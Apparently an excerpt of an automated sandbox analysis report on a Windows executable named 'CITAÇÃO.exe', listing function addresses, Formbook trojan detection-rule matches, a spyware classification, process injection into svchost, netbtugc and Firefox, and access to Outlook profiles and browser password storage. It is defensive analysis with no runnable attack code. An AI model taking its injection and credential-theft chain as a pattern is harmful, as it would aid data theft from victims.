            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0365EFA06_2_0365EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E0E596_2_035E0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369EE266_2_0369EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369EEDB6_2_0369EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035F2E906_2_035F2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369CE936_2_0369CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035EAD006_2_035EAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0367CD1F6_2_0367CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035DADE06_2_035DADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035F8DBF6_2_035F8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E0C006_2_035E0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035D0CF26_2_035D0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03680CB56_2_03680CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035CD34C6_2_035CD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369132D6_2_0369132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0362739A6_2_0362739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036812ED6_2_036812ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035FB2C06_2_035FB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035FD2F06_2_035FD2F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E52A06_2_035E52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036AB16B6_2_036AB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0361516C6_2_0361516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035CF1726_2_035CF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035EB1B06_2_035EB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036970E96_2_036970E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369F0E06_2_0369F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E70C06_2_035E70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0368F0CC6_2_0368F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369F7B06_2_0369F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036916CC6_2_036916CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036975716_2_03697571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0367D5B06_2_0367D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035D14606_2_035D1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369F43F6_2_0369F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369FB766_2_0369FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03655BF06_2_03655BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0361DBF96_2_0361DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035FFB806_2_035FFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03653A6C6_2_03653A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369FA496_2_0369FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03697A466_2_03697A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0368DAC66_2_0368DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03625AA06_2_03625AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0367DAAC6_2_0367DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03681AA36_2_03681AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E99506_2_035E9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035FB9506_2_035FB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036759106_2_03675910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0364D8006_2_0364D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E38E06_2_035E38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369FF096_2_0369FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E1F926_2_035E1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369FFB16_2_0369FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E9EB06_2_035E9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03697D736_2_03697D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E3D406_2_035E3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03691D5A6_2_03691D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035FFDC06_2_035FFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03659C326_2_03659C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369FCF26_2_0369FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B61A306_2_02B61A30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5CB806_2_02B5CB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5C9606_2_02B5C960
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5C9596_2_02B5C959
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5AC006_2_02B5AC00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B632A06_2_02B632A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B6329B6_2_02B6329B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B632596_2_02B63259
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B650B06_2_02B650B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B7B5F06_2_02B7B5F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339E3386_2_0339E338
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339E7EC6_2_0339E7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339E4536_2_0339E453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339CB036_2_0339CB03
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339CAAB6_2_0339CAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339D8586_2_0339D858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0364EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0365F290 appears 103 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 035CB970 appears 262 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03627E54 appears 99 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03615130 appears 58 times
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: String function: 00445AE0 appears 65 times
            Source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1779116308.00000000046F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CITA#U00c7#U00c3O.exe
            Source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1779229450.000000000489D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CITA#U00c7#U00c3O.exe
            Source: CITA#U00c7#U00c3O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/11
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeFile created: C:\Users\user\AppData\Local\Temp\carryoverJump to behavior
            Source: CITA#U00c7#U00c3O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000006.00000002.4151687754.00000000031D1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2282999847.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2283949430.00000000031D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CITA#U00c7#U00c3O.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeFile read: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"Jump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: CITA#U00c7#U00c3O.exeStatic file information: File size 1353653 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DJonRIGNYjBRZ.exe, 00000005.00000000.1913555619.00000000007EE000.00000002.00000001.01000000.00000005.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4151235223.00000000007EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1778079460.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CITA#U00c7#U00c3O.exe, 00000000.00000003.1776550231.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890366251.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1892230836.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.000000000373E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2004390893.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2002161958.0000000003247000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1778079460.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CITA#U00c7#U00c3O.exe, 00000000.00000003.1776550231.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2002269584.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890366251.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1892230836.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4153269474.000000000373E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2004390893.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2002161958.0000000003247000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1971008529.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002077943.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000003.1951321125.00000000008AB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4153839675.0000000003BCC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000C51C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4153839675.0000000003BCC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000C51C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1971008529.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002077943.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000003.1951321125.00000000008AB000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: CITA#U00c7#U00c3O.exeStatic PE information: real checksum: 0xa961f should be: 0x1538ff
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0267D211 pushad ; ret 1_2_0267D212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026832A3 push esi; ret 1_2_026832A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268136F push edi; retf 1_2_02681372
